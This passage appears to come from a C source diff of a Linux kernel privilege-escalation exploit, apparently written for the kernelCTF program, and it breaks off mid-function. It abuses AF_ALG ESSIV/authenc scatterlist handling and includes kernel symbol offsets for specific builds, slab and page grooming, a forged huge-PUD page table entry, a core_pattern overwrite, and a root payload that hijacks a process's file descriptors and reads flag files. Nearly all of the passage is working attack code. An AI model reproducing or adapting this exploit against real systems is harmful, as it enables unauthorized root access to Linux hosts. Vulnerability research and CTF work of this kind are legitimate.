0x96,0xac,0x74,0x22,0xe7,0xad,0x35,0x85,0xe2,0xf9,0x37,0xe8,0x1c,0x75,0xdf,0x6e, + 0x47,0xf1,0x1a,0x71,0x1d,0x29,0xc5,0x89,0x6f,0xb7,0x62,0x0e,0xaa,0x18,0xbe,0x1b, + 0xfc,0x56,0x3e,0x4b,0xc6,0xd2,0x79,0x20,0x9a,0xdb,0xc0,0xfe,0x78,0xcd,0x5a,0xf4, + 0x1f,0xdd,0xa8,0x33,0x88,0x07,0xc7,0x31,0xb1,0x12,0x10,0x59,0x27,0x80,0xec,0x5f, + 0x60,0x51,0x7f,0xa9,0x19,0xb5,0x4a,0x0d,0x2d,0xe5,0x7a,0x9f,0x93,0xc9,0x9c,0xef, + 0xa0,0xe0,0x3b,0x4d,0xae,0x2a,0xf5,0xb0,0xc8,0xeb,0xbb,0x3c,0x83,0x53,0x99,0x61, + 0x17,0x2b,0x04,0x7e,0xba,0x77,0xd6,0x26,0xe1,0x69,0x14,0x63,0x55,0x21,0x0c,0x7d +}; + +static const uint8_t Rcon[11] = { + 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36 +}; + +#define getSBoxValue(num) (sbox[(num)]) +#define getSBoxInvert(num) (rsbox[(num)]) + +static void KeyExpansion(uint8_t *RoundKey, const uint8_t *Key) +{ + unsigned i, j, k; + uint8_t tempa[4]; + + for (i = 0; i < Nk; ++i) { + RoundKey[(i * 4) + 0] = Key[(i * 4) + 0]; + RoundKey[(i * 4) + 1] = Key[(i * 4) + 1]; + RoundKey[(i * 4) + 2] = Key[(i * 4) + 2]; + RoundKey[(i * 4) + 3] = Key[(i * 4) + 3]; + } + + for (i = Nk; i < Nb * (Nr + 1); ++i) { + k = (i - 1) * 4; + tempa[0] = RoundKey[k + 0]; + tempa[1] = RoundKey[k + 1]; + tempa[2] = RoundKey[k + 2]; + tempa[3] = RoundKey[k + 3]; + + if (i % Nk == 0) { + /* RotWord */ + uint8_t u8tmp = tempa[0]; + tempa[0] = tempa[1]; + tempa[1] = tempa[2]; + tempa[2] = tempa[3]; + tempa[3] = u8tmp; + /* SubWord */ + tempa[0] = getSBoxValue(tempa[0]); + tempa[1] = getSBoxValue(tempa[1]); + tempa[2] = getSBoxValue(tempa[2]); + tempa[3] = getSBoxValue(tempa[3]); + tempa[0] = tempa[0] ^ Rcon[i / Nk]; + } + if (i % Nk == 4) { + tempa[0] = getSBoxValue(tempa[0]); + tempa[1] = getSBoxValue(tempa[1]); + tempa[2] = getSBoxValue(tempa[2]); + tempa[3] = getSBoxValue(tempa[3]); + } + j = i * 4; k = (i - Nk) * 4; + RoundKey[j + 0] = RoundKey[k + 0] ^ tempa[0]; + RoundKey[j + 1] = RoundKey[k + 1] ^ tempa[1]; + RoundKey[j + 2] = RoundKey[k + 2] ^ tempa[2]; + RoundKey[j + 3] = RoundKey[k + 3] ^ tempa[3]; + } +} + +static void AddRoundKey(uint8_t round, state_t *state, const uint8_t *RoundKey) +{ + for (uint8_t i = 0; i < 4; ++i) + for (uint8_t j = 0; j < 4; ++j) + (*state)[i][j] ^= RoundKey[(round * Nb * 4) + (i * Nb) + j]; +} + +static void InvSubBytes(state_t *state) +{ + for (uint8_t i = 0; i < 4; ++i) + for (uint8_t j = 0; j < 4; ++j) + (*state)[j][i] = getSBoxInvert((*state)[j][i]); +} + +static void InvShiftRows(state_t *state) +{ + uint8_t temp; + /* Row 1: shift right 1 */ + temp = (*state)[3][1]; + (*state)[3][1] = (*state)[2][1]; + (*state)[2][1] = (*state)[1][1]; + (*state)[1][1] = (*state)[0][1]; + (*state)[0][1] = temp; + /* Row 2: shift right 2 */ + temp = (*state)[0][2]; + (*state)[0][2] = (*state)[2][2]; + (*state)[2][2] = temp; + temp = (*state)[1][2]; + (*state)[1][2] = (*state)[3][2]; + (*state)[3][2] = temp; + /* Row 3: shift right 3 */ + temp = (*state)[0][3]; + (*state)[0][3] = (*state)[1][3]; + (*state)[1][3] = (*state)[2][3]; + (*state)[2][3] = (*state)[3][3]; + (*state)[3][3] = temp; +} + +static uint8_t xtime(uint8_t x) +{ + return ((x << 1) ^ (((x >> 7) & 1) * 0x1b)); +} + +static uint8_t Multiply(uint8_t x, uint8_t y) +{ + return (((y & 1) * x) ^ + ((y >> 1 & 1) * xtime(x)) ^ + ((y >> 2 & 1) * xtime(xtime(x))) ^ + ((y >> 3 & 1) * xtime(xtime(xtime(x)))) ^ + ((y >> 4 & 1) * xtime(xtime(xtime(xtime(x)))))); +} + +static void InvMixColumns(state_t *state) +{ + uint8_t a, b, c, d; + for (int i = 0; i < 4; ++i) { + a = (*state)[i][0]; + b = (*state)[i][1]; + c = (*state)[i][2]; + d = (*state)[i][3]; + (*state)[i][0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09); + (*state)[i][1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d); + (*state)[i][2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b); + (*state)[i][3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e); + } +} + +static void InvCipher(state_t *state, const uint8_t *RoundKey) +{ + AddRoundKey(Nr, state, RoundKey); + for (uint8_t round = (Nr - 1); ; --round) { + InvShiftRows(state); + InvSubBytes(state); + AddRoundKey(round, state, RoundKey); + if (round == 0) break; + InvMixColumns(state); + } +} + +static void aes256_ecb_decrypt(const uint8_t *key, const uint8_t *in, uint8_t *out) +{ + struct AesCtx ctx; + KeyExpansion(ctx.RoundKey, key); + memcpy(out, in, AES_BLOCKLEN); + InvCipher((state_t *)out, ctx.RoundKey); +} + +/* ================================================================== */ +/* Embedded SHA-256 (minimal, single-use) */ +/* ================================================================== */ + +static const uint32_t sha256_k[64] = { + 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5, + 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174, + 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da, + 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967, + 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85, + 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,0xd192e819,0xd6990624,0xf40e3585,0x106aa070, + 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3, + 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2 +}; + +#define SHA_ROTR(x,n) (((x) >> (n)) | ((x) << (32-(n)))) +#define SHA_CH(x,y,z) (((x) & (y)) ^ (~(x) & (z))) +#define SHA_MAJ(x,y,z) (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z))) +#define SHA_EP0(x) (SHA_ROTR(x,2) ^ SHA_ROTR(x,13) ^ SHA_ROTR(x,22)) +#define SHA_EP1(x) (SHA_ROTR(x,6) ^ SHA_ROTR(x,11) ^ SHA_ROTR(x,25)) +#define SHA_SIG0(x) (SHA_ROTR(x,7) ^ SHA_ROTR(x,18) ^ ((x) >> 3)) +#define SHA_SIG1(x) (SHA_ROTR(x,17) ^ SHA_ROTR(x,19) ^ ((x) >> 10)) + +static void sha256_transform(uint32_t state[8], const uint8_t data[64]) +{ + uint32_t a, b, c, d, e, f, g, h, t1, t2, m[64]; + int i; + + for (i = 0; i < 16; ++i) + m[i] = ((uint32_t)data[i*4] << 24) | ((uint32_t)data[i*4+1] << 16) | + ((uint32_t)data[i*4+2] << 8) | ((uint32_t)data[i*4+3]); + for (; i < 64; ++i) + m[i] = SHA_SIG1(m[i-2]) + m[i-7] + SHA_SIG0(m[i-15]) + m[i-16]; + + a = state[0]; b = state[1]; c = state[2]; d = state[3]; + e = state[4]; f = state[5]; g = state[6]; h = state[7]; + + for (i = 0; i < 64; ++i) { + t1 = h + SHA_EP1(e) + SHA_CH(e,f,g) + sha256_k[i] + m[i]; + t2 = SHA_EP0(a) + SHA_MAJ(a,b,c); + h = g; g = f; f = e; e = d + t1; + d = c; c = b; b = a; a = t1 + t2; + } + + state[0] += a; state[1] += b; state[2] += c; state[3] += d; + state[4] += e; state[5] += f; state[6] += g; state[7] += h; +} + +/* + * Compute SHA-256 of (data, datalen). Output is 32 bytes in hash_out. + * Minimal implementation -- handles any length up to ~2^32 bytes. + */ +static void sha256(const uint8_t *data, size_t datalen, uint8_t *hash_out) +{ + uint32_t state[8] = { + 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, + 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19 + }; + uint8_t block[64]; + size_t i, left; + uint64_t bitlen; + + /* Process full 64-byte blocks */ + for (i = 0; i + 64 <= datalen; i += 64) + sha256_transform(state, data + i); + + /* Pad final block */ + left = datalen - i; + memset(block, 0, 64); + memcpy(block, data + i, left); + block[left] = 0x80; + + if (left >= 56) { + sha256_transform(state, block); + memset(block, 0, 64); + } + + bitlen = (uint64_t)datalen * 8; + block[56] = (bitlen >> 56) & 0xff; + block[57] = (bitlen >> 48) & 0xff; + block[58] = (bitlen >> 40) & 0xff; + block[59] = (bitlen >> 32) & 0xff; + block[60] = (bitlen >> 24) & 0xff; + block[61] = (bitlen >> 16) & 0xff; + block[62] = (bitlen >> 8) & 0xff; + block[63] = (bitlen) & 0xff; + sha256_transform(state, block); + + for (i = 0; i < 8; i++) { + hash_out[i*4] = (state[i] >> 24) & 0xff; + hash_out[i*4 + 1] = (state[i] >> 16) & 0xff; + hash_out[i*4 + 2] = (state[i] >> 8) & 0xff; + hash_out[i*4 + 3] = (state[i]) & 0xff; + } +} + +/* ------------------------------------------------------------------ */ +/* Target-specific kernel symbol offsets (virtual address - STEXT) */ +/* ------------------------------------------------------------------ */ + +#define STEXT 0xffffffff81000000UL /* kernel _stext virtual address */ + +#if defined(LTS) /* LTS 6.12.48 */ +#define CORE_PATTERN (0xffffffff842107e0UL - STEXT) +#define BRK_BASE (0xffffffff85600000UL - STEXT) + +#elif defined(MIT) /* mitigation-v4-6.6 */ +#define CORE_PATTERN (0xffffffff83db3720UL - STEXT) +#define BRK_BASE (0xffffffff84e00000UL - STEXT) + +#elif defined(COS) /* cos-121-18867.199.56 */ +#define CORE_PATTERN (0xffffffff83fb4940UL - STEXT) +#define BRK_BASE (0xffffffff85200000UL - STEXT) + +#elif defined(MIT_612) /* mitigation-v4-6.12 (kernel 6.12.0) */ +#define CORE_PATTERN 0x321b460UL +#define BRK_BASE 0x4400000UL + +#else +/* Default to MIT_612 if no target defined */ +#define MIT_612 1 +#define CORE_PATTERN 0x321b460UL +#define BRK_BASE 0x4400000UL + +#endif + +/* Page-aligned base and intra-page offset of core_pattern */ +#define CORE_PATTERN_PAGE_OFFSET (CORE_PATTERN & 0xfff) +#define CORE_PATTERN_PAGE_BASE (CORE_PATTERN & ~0xfffUL) + +/* ------------------------------------------------------------------ */ +/* PTE flags for x86-64 page table entries */ +/* ------------------------------------------------------------------ */ + +/* Present | RW | User | Accessed | Dirty (first-pass PTE) + * Points to physical address 0x9c000 (trampoline_pgd), which contains + * the _brk area virtual address -- used to derive _stext physical address. + * See: https://github.com/google/security-research/blob/ca13fc6d5e7184b13bb82a91dd3a6fa2430fdbd7/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md#leak-through-write */ +/* PUD-mode branch: observed live runs repeatedly write our chosen value into a + * user PUD page, not a PTE page. Treat that as the primitive by installing a + * deliberate 1GB huge-PUD leaf: Present | RW | User | Accessed | Dirty | PSE. + * Pass 1 maps physical 0..1GB so VA+0x9c000 reads the trampoline page. Pass 2 + * maps the 1GB physical region containing core_pattern. */ +#define PUD_HUGE_FLAGS 0x00000000000000e7UL +#define PTE_FLAGS_FIRST_PASS PUD_HUGE_FLAGS +#define PTE_FLAGS_SECOND_PASS PUD_HUGE_FLAGS +#define PUD_HUGE_MASK 0x3fffffffUL +#define PUD_HUGE_SIZE 0x40000000UL +#define TRAMPOLINE_PHYS 0x9c000UL + +/* ------------------------------------------------------------------ */ +/* Exploit layout constants */ +/* ------------------------------------------------------------------ */ + +#define PAGE_SIZE 0x1000 + +/* ORIGINAL spray params: 0x400 pages at 2MB spacing from 0x200000. + * The "bad pud" on first run PROVES the PTE value write works. + * The PUD-level write is because freed pipe pages go to PUD alloc. + * This is actually OK — the PUD entry maps a 1GB region. + * If PUD entry = 0x800000000009c067: the entire 1GB maps to phys 0x9c000. + * Accessing any address in that 1GB reads from phys 0x9c000 page! */ +#define PTE_SPRAY_COUNT 0x400 +/* Spacing between sprayed pages (each in a separate PTE page) */ +#define PTE_SPRAY_SPACING 0x200000 +/* Base virtual address for the PTE spray region */ +#define PTE_SPRAY_BASE 0x200000UL + +/* Size of the authenc sendmsg payload */ +#define AUTHENC_SENDMSG_LEN 0x20 +/* Number of splice calls per pipe. 17 total splices (8+8+1) ensures + * areq->tsgl_entries is large -> tsgl lands in a bigger kmalloc slab. */ +#define SPLICE_COUNT_PER_PIPE 0x8 +/* Bytes per splice call */ +#define SPLICE_CHUNK_SIZE 0x4 /* ORIGINAL: must keep small for correct SGL chain layout */ +/* Pipe fill size (pages of data written to each pipe) */ +#define PIPE_FILL_SIZE 0x2000 /* ORIGINAL: 8KB per pipe */ + +/* Number of valid iovec entries for the sacrificial recvmsg */ +#define RECVMSG_VALID_IOVECS 32 +/* Total iovec count passed to recvmsg (rest are zero-initialized) */ +#define RECVMSG_TOTAL_IOVECS 0x100 + +/* Size of the crafted Unix datagram payload for slab reclaim */ +#define CRAFT_PAYLOAD_SIZE 0x208 +/* Offset within the crafted payload where the fake scatterlist entry is placed. + * Calculated as 0x10 + 0xf * 0x20 = 0x1f0, aligning with where scatterwalk_ffwd + * reads after walking past valid entries with the overflowed offset. */ +#define FAKE_SGL_ENTRY_OFFSET (0x10 + 0xf * 0x20) +/* Fake scatterlist length: large unsigned value that causes scatterwalk_ffwd to + * consume most of the remaining overflowed offset in a single subtraction. */ +#define FAKE_SGL_LENGTH 0xffffffe0U + +/* + * struct scatterlist field offsets: + * unsigned long page_link; // +0x00 + * unsigned int offset; // +0x08 + * unsigned int length; // +0x0c + * dma_addr_t dma_address; // +0x10 + * unsigned int dma_length; // +0x18 + * unsigned int dma_flags; // +0x1c + */ +#define SCATTERLIST_OFFS_PAGE_LINK 0x00 +#define SCATTERLIST_OFFS_OFFSET 0x08 +#define SCATTERLIST_OFFS_LENGTH 0x0c + +/* + * Mask for extracting the page-aligned physical address from the leaked + * value at trampoline_pgd. The _brk area is 64KB-aligned, so masking the + * low 16 bits yields the correct page frame base. + */ +#define PHYS_ADDR_ALIGN_MASK 0xffffUL + +/* Authenc key layout: 8-byte RTA header + 32-byte HMAC key + 16-byte AES key */ +#define RTA_HEADER_SIZE 8 +#define HMAC_KEY_SIZE 32 +#define AES_KEY_SIZE 16 +#define TOTAL_KEY_SIZE (RTA_HEADER_SIZE + HMAC_KEY_SIZE + AES_KEY_SIZE) + +/* AES block / IV size */ +#define AES_IV_SIZE 16 + +/* ESSIV sendmsg payload size */ +#define ESSIV_SENDMSG_LEN 0x20 + +/* core_pattern payload written through the remapped PTE */ +#define CORE_PATTERN_PAYLOAD "|/proc/%P/root/tmp/ex %P" + +/* ------------------------------------------------------------------ */ +/* ESSIV IV pre-computation (embedded AES-256-ECB + SHA-256) */ +/* ------------------------------------------------------------------ */ + +/* + * Pre-computed ESSIV salt = SHA256(enc_key || auth_key). + * enc_key = {0x10..0x1f}, auth_key = {0x00..0x1f} + * The kernel's essiv_aead_setkey hashes the combined keys to derive the + * AES-ECB key used for IV encryption. + */ +static const uint8_t essiv_salt[32] = { + 0x4d, 0x62, 0x42, 0x4a, 0x90, 0xb0, 0x75, 0xd0, + 0xaf, 0x9f, 0xed, 0x1c, 0x82, 0xa0, 0x93, 0x27, + 0xd9, 0x71, 0xa0, 0xca, 0x43, 0x77, 0xfd, 0x78, + 0x85, 0x69, 0x44, 0x0b, 0xa2, 0xe7, 0xde, 0x6f +}; + +/* + * Pre-compute the IV that will produce the desired page-table value after ESSIV + * encryption. The exploit stores the desired output in iv[0..15], and this + * function replaces it with the corresponding AES-256-ECB decryption (the + * inverse of what the kernel will encrypt). + */ +static void compute_iv(uint8_t *iv, int is_pass2) +{ + uint8_t iv_dec[AES_IV_SIZE]; + aes256_ecb_decrypt(essiv_salt, iv, iv_dec); + + printf("ESSIV decrypted IV (%s runtime): ", is_pass2 ? "pass2" : "pass1"); + for (int i = 0; i < AES_IV_SIZE; i++) printf("%02x", iv_dec[i]); + printf("\n"); + + memcpy(iv, iv_dec, AES_IV_SIZE); +} + +/* ------------------------------------------------------------------ */ +/* Utility */ +/* ------------------------------------------------------------------ */ + +static void pin_cpu(int cpu) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(cpu, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +/* + * Build the authenc key blob used by both the sacrificial and ESSIV sockets. + * Layout: [4-byte RTA len][4-byte AES keylen][32-byte HMAC key][16-byte AES key] + */ +static void build_authenc_key(unsigned char *key) +{ + memset(key, 0, TOTAL_KEY_SIZE); + /* RTA header: type=1 (CRYPTO_AUTHENC_KEYA_PARAM), len=8 */ + key[0] = 0x08; key[1] = 0x00; key[2] = 0x01; key[3] = 0x00; + /* AES key length = 16 (AES-128) */ + key[4] = 0x00; key[5] = 0x00; key[6] = 0x00; key[7] = 0x10; + for (int i = 0; i < HMAC_KEY_SIZE; i++) key[RTA_HEADER_SIZE + i] = i; + for (int i = 0; i < AES_KEY_SIZE; i++) key[RTA_HEADER_SIZE + HMAC_KEY_SIZE + i] = i + 0x10; +} + +/* ------------------------------------------------------------------ */ +/* Helper: create an AEAD transform socket and set the authenc key. */ +/* Returns tfmfd; the caller must accept() to get an opfd. */ +/* ------------------------------------------------------------------ */ + +static int create_aead_tfmfd(const char *alg_name) +{ + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "aead", + }; + strncpy((char *)sa.salg_name, alg_name, sizeof(sa.salg_name) - 1); + + int tfmfd = SYSCHK(socket(AF_ALG, SOCK_SEQPACKET, 0)); + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind(aead)"); + exit(1); + } + + unsigned char key[TOTAL_KEY_SIZE]; + build_authenc_key(key); + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt(ALG_SET_KEY)"); + exit(1); + } + + return tfmfd; +} + +/* ------------------------------------------------------------------ */ +/* Step 2a: Create a sacrificial authenc AEAD with pipe-page TX SGL */ +/* entries. Closing pipes makes alg socket the sole page ref. */ +/* ------------------------------------------------------------------ */ + +/* + * Create an authenc(hmac(sha512),cbc(aes)) AEAD socket and splice anonymous + * pipe pages into its TX SGL. When recvmsg is called later (in + * spray_fake_scatterlist), _aead_recvmsg builds a chained SGL: + * first_rsgl[0..15] -> chain -> second_rsgl[0..N] -> chain -> tsgl (pipe pages) + * af_alg_free_resources then frees everything: second_rsgl, put_page on pipe + * pages (freeing them to page allocator), tsgl, and the areq itself. + * The slab slots retain residual data including chain links. + */ +static int setup_sacrificial_aead(char *data_buf) +{ + int tfmfd = create_aead_tfmfd("authenc(hmac(sha512),cbc(aes))"); + + /* Fill two pipes with data to be spliced into the AEAD scatterlist */ + int pipe_a[2], pipe_b[2]; + SYSCHK(pipe(pipe_a)); + SYSCHK(pipe(pipe_b)); + write(pipe_a[1], data_buf, PIPE_FILL_SIZE); + write(pipe_b[1], data_buf, PIPE_FILL_SIZE); + + /* Accept after pipes are filled -- preserves the original allocation + * ordering, which is important for correct slab placement. */ + int opfd = SYSCHK(accept(tfmfd, NULL, 0)); + + /* Send initial data with ALG_SET_OP=DECRYPT and ALG_SET_IV via sendmsg */ + unsigned char local_iv[AES_IV_SIZE] = {0}; + struct iovec iov = { data_buf, AUTHENC_SENDMSG_LEN }; + + char cbuf[CMSG_SPACE(sizeof(uint32_t)) + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE)]; + memset(cbuf, 0, sizeof(cbuf)); + + struct msghdr msg = {0}; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t)); + *(uint32_t *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, local_iv, AES_IV_SIZE); + + ssize_t sent = sendmsg(opfd, &msg, MSG_MORE); + if (sent < 0) { perror("sendmsg(authenc)"); exit(1); } + printf("[*] Authenc sendmsg: %zd bytes\n", sent); + + /* Splice anonymous pipe pages into the AEAD socket to create many TX SGL entries. + * 8 splices from pipe_a + 8 from pipe_b (all with SPLICE_F_MORE) + 1 final. + * Using 17 splices ensures areq->tsgl_entries is large, placing the tsgl + * allocation in a bigger kmalloc slab (e.g., kmalloc-1024) that is less + * likely to be reclaimed by other kernel heap activity before the PTE spray. */ + for (int i = 0; i < SPLICE_COUNT_PER_PIPE; i++) + SYSCHK(splice(pipe_a[0], 0, opfd, 0, SPLICE_CHUNK_SIZE, SPLICE_F_MORE)); + for (int i = 0; i < SPLICE_COUNT_PER_PIPE; i++) + SYSCHK(splice(pipe_b[0], 0, opfd, 0, SPLICE_CHUNK_SIZE, SPLICE_F_MORE)); + SYSCHK(splice(pipe_b[0], 0, opfd, 0, 1, 0)); /* final splice without MORE */ + + close(pipe_a[0]); + close(pipe_a[1]); + close(pipe_b[0]); + close(pipe_b[1]); + + return opfd; +} + +/* ------------------------------------------------------------------ */ +/* Step 2b/2c: recvmsg builds chained SGL then frees it; ctl_buf */ +/* spray reclaims second_rsgl with crafted fake SGL entry. */ +/* ------------------------------------------------------------------ */ + +/* + * Phase 2b: recvmsg on the sacrificial authenc socket with 32 iovecs + * (1 byte each) builds a chained SGL inside the areq: + * first_rsgl[0..15] (16 entries, length=1 each) + * -> sgl[16] chain -> second_rsgl (sock_kmalloc'd) + * -> chain -> areq->tsgl (anonymous pipe pages from af_alg_pull_tsgl) + * After the crypto op, af_alg_free_resources frees second_rsgl, calls + * put_page on pipe pages (freeing them to page allocator), and frees areq. + * Slab slots retain residual data including all chain links. + * + * Phase 2c: sendmsg on Unix socket with msg_control = 0x208 crafted bytes. + * ____sys_sendmsg does sock_kmalloc(0x208) -> copy -> sock_kfree_s, reclaiming + * the second_rsgl slab slot. The crafted data plants a fake SGL entry with + * length=0xffffffe0 at FAKE_SGL_ENTRY_OFFSET. The chain link to old tsgl + * (beyond offset 0x208) is preserved as residual data. + * + * Result: areq slab has residual chained SGL: + * first_rsgl[0..15] (1-byte each) -> chain -> second_rsgl (crafted, 0xffffffe0) + * -> chain -> tsgl (freed pipe pages, to be reclaimed as PTE pages) + * + * The ESSIV recv allocates its areq from this same slab slot. outlen = 0 + * causes af_alg_get_rsgl to return early (sg_init_table never called), so + * the entire first_rsgl.sgl.sgl[] is uninitialized -- containing this + * residual chained SGL. + */ +static void spray_fake_scatterlist(int authenc_opfd, int unix_sock) +{ + /* Allocate two pages, unmap the second to limit how much recvmsg consumes */ + char *pbuf = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0); + munmap(pbuf + PAGE_SIZE, PAGE_SIZE); + + /* Set up iovec: 32 valid 1-byte entries, rest zero-initialized */ + struct iovec iov[RECVMSG_TOTAL_IOVECS] = {0}; + for (int i = 0; i < RECVMSG_VALID_IOVECS; i++) { + iov[i].iov_base = pbuf; + iov[i].iov_len = 1; + } + + struct msghdr msg = {0}; + msg.msg_iov = iov; + msg.msg_iovlen = RECVMSG_TOTAL_IOVECS; + + /* Phase 2b: recvmsg builds chained SGL (first_rsgl -> second_rsgl -> tsgl), + * runs crypto op, then af_alg_free_resources frees everything -- put_page + * on pipe pages frees them to page allocator. Residual chain links remain. */ + recvmsg(authenc_opfd, &msg, 0); + + /* Phase 2c: ctl_buf spray reclaims second_rsgl slab slot with crafted data. + * ____sys_sendmsg: sock_kmalloc(0x208) -> copy -> sock_kfree_s. + * Chain link to old tsgl (beyond 0x208 bytes) is preserved as residual. */ + char *craft = pbuf; + memset(craft, 0, CRAFT_PAYLOAD_SIZE); + /* Place a fake struct scatterlist at FAKE_SGL_ENTRY_OFFSET within the + * second_rsgl slab slot. scatterwalk_ffwd will: + * 1. Walk first_rsgl[0..15]: 16 x length=1 -> consumes 16 from 0xfffffff0 + * 2. Follow chain (sgl[16]) -> second_rsgl (this crafted entry) + * 3. length=0xffffffe0 -> consumes remaining 0xffffffe0, len becomes 0 + * 4. sg_next follows preserved chain -> tsgl entry (freed pipe page = PTE page) + * 5. IV write lands on PTE page */ + *(size_t *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_PAGE_LINK] = 0x4141414140; + *(int *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_OFFSET] = 0; + *(int *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_LENGTH] = FAKE_SGL_LENGTH; + + printf("[*] Crafted fake SGL at %p\n", craft); + msg.msg_control = craft; + msg.msg_controllen = CRAFT_PAYLOAD_SIZE; + + sendmsg(unix_sock, &msg, 0); +} + +/* ------------------------------------------------------------------ */ +/* Root payload (executed via core_pattern as root) */ +/* ------------------------------------------------------------------ */ + +/* + * When invoked via core_pattern with a PID argument, steal the crashing + * process's stdin/stdout/stderr and read the flag. + */ +static void root_payload(const char *pid_str) +{ + int pid = strtoull(pid_str, NULL, 10); + int pidfd = syscall(434 /*pidfd_open*/, pid, 0); + int stdinfd = syscall(438 /*pidfd_getfd*/, pidfd, 0, 0); + int stdoutfd = syscall(438 /*pidfd_getfd*/, pidfd, 1, 0); + int stderrfd = syscall(438 /*pidfd_getfd*/, pidfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Read the flag multiple times for reliability (first attempt may fail + * if stdout is not yet fully connected). The final invocation also + * triggers sysrq-o (poweroff) so the kernelCTF PR verification workflow + * can proceed to the next attempt quickly instead of waiting for a timeout. */ + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null"); + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null"); + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null; echo o>/proc/sysrq-trigger"); + exit(0); +} + +/* ------------------------------------------------------------------ */ +/* Vulnerability-only trigger for the kernelCTF vuln-verify workflow */ +/* ------------------------------------------------------------------ */ + +static int vuln_trigger(void) +{ + static char data_buf[ESSIV_SENDMSG_LEN] = {0}; + static char out_buf[ESSIV_SENDMSG_LEN] = {0}; + unsigned char iv[AES_IV_SIZE] = {0}; + char cbuf[CMSG_SPACE(sizeof(__u32)) + + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) + + CMSG_SPACE(sizeof(__u32))]; + + int opfd = SYSCHK(accept( + create_aead_tfmfd("essiv(authenc(hmac(sha256),cbc(aes)),sha256)"), + NULL, 0)); + + struct msghdr msg = {0}; + struct iovec iov = { data_buf, sizeof(data_buf) }; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = 0; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, iv, AES_IV_SIZE); + + int ret = sendmsg(opfd, &msg, 0); + printf("[*] vuln-trigger sendmsg returned: %d errno=%d\n", + ret, ret < 0 ? errno : 0); + if (ret >= 0) { + ret = recv(opfd, out_buf, sizeof(out_buf), 0); + printf("[*] vuln-trigger recv returned: %d errno=%d\n", + ret, ret < 0 ? errno : 0); 